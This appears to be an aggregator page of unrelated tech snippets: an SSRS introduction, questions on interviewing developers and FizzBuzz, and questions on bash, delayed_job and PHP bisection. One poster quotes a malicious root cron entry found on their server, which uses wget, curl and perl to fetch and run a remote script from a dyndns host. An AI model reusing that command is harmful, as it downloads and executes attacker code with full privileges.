  • SQL SERVER – What is SSRS and Why SSRS is asked for in many Job Opening?

    - by Pinal Dave
This example is from the Beginning SSRS by Kathi Kellenberger. Supporting files are available with a free download from the www.Joes2Pros.com web site. This will be a 5 day blog post in getting started with SSRS. Today will show the importance of SSRS in the business. Why is SSRS asked for in so many job openings? If you talk to an SSRS expert it’s very clear to them exactly why companies really need this invention and how it saves time and adds business value. You don’t have to be an SSRS expert to know its value or to start using it. For example you don’t have to be an airline pilot to know the usefulness of modern transportation. Even the people who don’t know how to run SSRS but need the reports can tell you why that is needed. This blog post will go into why SSRS is an important invention by showing how it improves the usage of information in your company. Before SSRS there has always been a need for a company to benefit from the use of its own information. Excel spreadsheets have been a popular way to do this for a long time. With SSRS you can still use this solution and gain many other options too. A friend of mine told me a story about doing database work in the 90s for a major company and how he wished SSRS was available back then. The Vice President of the marketing channel would often come to him just before an important meeting with the board of directors. He often needed to show how certain product sales were performing over time. All this information was in the database so it was my friend’s job to get the information out and organized into a medium the VP could use. This medium was usually Excel. The VP often had meetings all over the world where he showcased this Excel report. The solution to get the VP to him anywhere he was in the world was an Excel file attached to an e-mail. This worked pretty well but with some drawbacks. One time my friend sent the wrong file in the e-mail. A few minutes later my friend realized his mistake and sent another frantic e-mail to VP. This one was saying to ignore the last e-mail and use this newer one. Would the VP see the correct e-mail in time? If SSRS had been available, my friend could have created a solution that let the VP run the report any time he wished. The report could have been published to the company intranet where the VP could run it from any of the offices he happened to be traveling to that month. There is a fair amount of work up front to develop and publish the report, but once that work is completed, the report can be reused as many times as needed. My friend could even be on vacation for the first day of the monthly and the VP can get his real-time report. Not only could the report show the most recent data, the VP could choose to view reports of previous months with just a few clicks. The deployed SSRS is user friendly, and can also be configured to protect reports from being run by the wrong people. Tomorrow’s Post Tomorrow’s blog post will show how to know if you already have SSRS installed. If you want to learn SSRS in easy to simple words – I strongly recommend you to get Beginning SSRS book from Joes 2 Pros. • How to disconnect a running bash job from the shell in Linux?

    - by raven
I have a script that starts a server on a remote VM. All works great until I close the shell where I executed the script. When the shell closes, so does the server. After some looking around I found the following: & will send the job to the background when executed with the symbol disown -h will disconnect the job from the shell and allow it to run regardless of the shell. The command I used is: ./startServer.sh nasb_wxscat160_catalog-4.1.6 1.0.8 > catalog-log.txt & disown -h When I closed the shell and checked using ps -ef | grep java to see if the job is still working I did see it in the list. However when I tried to connect to the server it was unresponsive. On deeper inspection, the log file was filled just until I closed the shell and using the ps -m flag I say the process jobs were not working. Has any one encountered some thing of this sort?

  • Suspect cron job Centos 6.5 + Virtualmin, Recommended course of action?

    - by sr_1436048
I was doing some routine maintenance on my server and noticed a new cron job. It is set to run every 5 minutes as root: cd /tmp;wget http://eventuallydown.dyndns.biz/abc.txt;curl -O http://eventuallydown.dyndns.biz/abc.txt;perl abc.txt;rm -f abc* I've tried to download the file, but there is nothing to download. The server is running normally and there are no strange signs that the box has been compromised other than this entry. The only thing I can think of is I recently installed Varnish Cache following this tutorial. Given that I did not enter the cron job and that there appears to be nothing wrong, besides disabling that cron job what would be the appropriate course of action from this point?

  • Interview questions for an Android developer

    - by John
I'm a Python and iPhone developer, with some previous C# experience. I've been asked to do an initial screen of some candidates so someone with more experience in Android is going to be following up. I did some searching on Stackoverflow and Google but wasn't able to find a good list of interview questions for an Android developer. Does anyone have suggestions for questions for a mid-level developer?

  • MySQL Interview Questions

    - by Campbell
Hi, I've been asked to screen some candidates for a MySQL DBA / Developer position for a role that requires an enterprise level skill set. I myself am a SQL Server person so I know what I would be looking for from that point of view with regards to scalability / design etc but is there anything specific I should be asking with regards to MySQL? I would ideally like to ask them about enterprise level features of MySQL that they would typically only use when working on a big database. Need to separate out the enterprise developers from the home / small website kind of guys. Thanks.

  • How to weed out the bad programmers from the competent ones in the interview process

    - by thaBadDawg
I am getting ready to add another developer to my team and I want to try and fix the mistakes I made in my last hiring cycle. I like to think of myself as a competent programmer (I can be given a project, I can deliver on that project and the deliverable work with very few if any bugs) and so I ask questions that I would ask myself in an interview. I've come to the conclusion that my interviewing skills are completely lacking because the last two people I've hired interviewed incredibly well but have been less than ideal at the tasks that they've been given. My CTO (who was completely useless in giving any guidance as to how) suggested I improve on my interviewing skills. The question is this - How does one programmer interview another programmer and get an understanding of the other programmer's abilities? Edit: Though slightly different, the answers provided to this question could be of use to you. That question concerns specific interview questions while yours seems to be more general about interview approaches and not just about the questions themselves. Update: Just for the hell of it I asked two of the guys I worked with if they could do FizzBuzz. 45 minutes and 80 minutes to work it out. And these aren't bottom level guys either.

  • Stats/Monitor/Inspector for beanstalkd

    - by Tim Lytle
Does anyone know of an app that can monitor a beanstalkd queue? I'm looking for something that shows stats on tubes and jobs, and allows you to inspect the details. I'm not really picky about language/platform, just want to know if there's something out there before I write my own.

  • How to show an animated spinner while a background task is processing in nested rails model using aj

    - by Globalkeith
My specific example is highly complex, so I will use the example shown by Ryan from Railscasts to discuss this: http://railscasts.com/episodes/197-nested-model-form-part-2 Background I have a form, let's say "Survey", which contains an arbitrary number of "Questions". Senario Give i am on the "Edit Survey" page. I would like to add a button to each "Question" field which calls a remote_function, which in turn queue's up a delayed_job to execute some processing on the "Question". To give feedback to the user, i would like to disable the button, and show an animated spinner, which remains until the delayed_job has processed the "Question". Hint - I can add methods to the "Question" model to indicate the status of the delayed_job. So, with best practices in mind, what is the best way to achieve this?

I am asking all the basic questions, where he is able to answer, if he is atleast the bookish knowledge. I want to ask some thing different where we can check his actual skills in technical. Can any one help me with some thoughts where i can use to get some good and technical challenging questions to ask?

  • .NET developer has a few hours to cram for a Java proficiency test. What to do?

    - by Paul Sasik
I have an interview tomorrow morning and just found out that I will also be taking an hour-long Java proficiency test! I am a certified C# .NET developer but have barely touched Java since college. (Yes, I am thinking about switching from .NET development to Java!) I'm not going to be able to effectively cram the whole of the Java library by tomorrow morning. What are some key ideas that I should study that might actually make a difference in such a short time frame? (The examiners will be taking into account that I have had little exposure to Java.) Thanks! Edit NOTE: I think that the exam is going to be written, so no specific IDE.

  • How long should it take a senior developer to solve FizzBuzz during an interview?

    - by Jim McKeeth
Assuming: Typical interview stress levels (I am watching) Using familiar IDE and program language (their choice on their PC!) Given adequate explanation and immediate answers to questions Able to compile code and check answers / progress Claims to be a senior level programmer How long should it take an interviewee to answer FizzBuzz correctly? Edit: FizzBuzz: Write a program that prints the numbers from 1 to 100. But for multiples of three print "Fizz" instead of the number and for the multiples of five print "Buzz". For numbers which are multiples of both three and five print "FizzBuzz". Edit: It isn't so much that if they take more then X minutes they are disqualified, but I am curious if I should just cut them loose after they work on it for half hour.

  • Programming tests: are they relevant?

    - by BlackVoid
Do online programming tests have any value (except for providing an evidence to potential employers) in terms of evaluating your knowledge, or a they too broad or too narrow in general? For examples, brainbench.com and similar websites. From my experience I have never found myself scoring particularly high, although I have many years of commercial experience and is doing great at work. These tests mostly refer to things I have never worked with (WebForms or ADO .Net, who works with ADO .Net directly anyway?), yet these tests claim to be C# tests. If you were hiring a programmer, would you consider online tests as an evidence of real skill?

  • Running tasks in the background with lower CPU priority

    - by Brendon Muir
I have a feature in my CMS that allows a user to upload a zip file full of images and the server will extract them and insert each one into an image gallery. I've noticed that this grinds up the CPU quite severely and causes other requests to slow down. I'm thinking of using the delayed_job plugin to delegate each image addition into the background, but I also want to give that process a lower CPU priority so that it doesn't bog down the server. I'm pretty confident in the delaying part of the exercise, but the throttling part is where I'm stuck. Is there a ruby way of lowering the priority of a method call? It's the image resizing that causes the CPU chew. Any ideas welcome :)

  • Are there such things as summer jobs for teenage programmers?

    - by Gbps
I've taken programming as a hobby, studying it since I was 10 or so. 7 years to date, I've become progressivly good at C++, PHP, C#, Assembly, Lua, and the web languages such as HTML and CSS. Though I've never taken a class, I've been able to complete most, if not all of the questions from different "Programmer Interview Questions" articles and have participated in some small scale projects in the past. Summer starting yesterday for me, I've been thinking about how to keep busy while maybe earning some money along the way. Now, some kids mow lawns, others get fast food jobs, but what about programming jobs? Is there even such a thing?

  • ruby on rails delajed_job failing with rvm

    - by mottalrd
I have delayed_job installed and I start the daemon to run the jobs with this ruby script require 'rubygems' require 'daemon_spawn' $: << '.' RAILS_ROOT = File.expand_path(File.join(File.dirname(__FILE__), '..')) class DelayedJobWorker < DaemonSpawn::Base def start(args) ENV['RAILS_ENV'] ||= args.first || 'development' Dir.chdir RAILS_ROOT require File.join('config', 'environment') Delayed::Worker.new.start end def stop system("kill `cat #{RAILS_ROOT}/tmp/pids/delayed_job.pid`") end end DelayedJobWorker.spawn!(:log_file => File.join(RAILS_ROOT, "log", "delayed_job.log"), :pid_file => File.join(RAILS_ROOT, 'tmp', 'pids', 'delayed_job.pid'), :sync_log => true, :working_dir => RAILS_ROOT) If I run the command with rvmsudo it works perfectly If I simply use the ruby command without rvm it fails and this is the output, but I have no idea why this happens. Could you give me some clue? • Should entry level programmers be able to answer FizzBuzz?

    - by Bryan Rowe
When interviewing entry level developers, I have used the FizzBuzz question as a type of acid test. Generally, I ask for a solution in pseudo-code or any language of their choice. If someone can't answer this question -- or get reasonably close, the interview generally ends shortly thereafter and we don't progress to more interesting code questions. In your opinion, is it fair/appropriate/accurate to filter entry-level staff in this manner? Should the average four year college graduate have a reasonable enough foundation to be able to throw up a pseudo-code solution of FizzBuzz?

  • books or online resources to prepare for .NET interviews for senior developer role

    - by RKP
Hi, can you suggest some good books or online resources (FAQ or articles) to prepare for .NET interviews (.NET concepts, ASP.NET, C# etc) for senior developer role? something to refresh the concepts, not too much detailed. there could be stuff I haven't done before (that applies to everyone), so at least knowing little bit about it, will definitely help. google search shows me some website with lots of QA, but they are not authentic (I found some answers inaccurate). thanks in advance.

  • Implement functionality in PHP?

    - by Rachel
How can we Implement Bisect Python functionality in PHP Implement function bisect_left($arr, $item); as a pure-PHP routine to do a binary-bisection search for the position at which to insert $item into $list, maintaining the sort order therein. Assumptions: Assume that $arr is already sorted by whatever comparisons would be yielded by the stock PHP < operator, and that it's indexed on ints. The function should return an int, representing the index within the array at which $item would be inserted to maintain the order of the array. The returned index should be below any elements in $arr equal to $item, i.e., the insertion index should be "to the left" of anything equal to $item. Search routine should not be linear! That is, it should honor the name, and should attempt to find it by iteratively bisecting the list and comparing only around the midpoint.
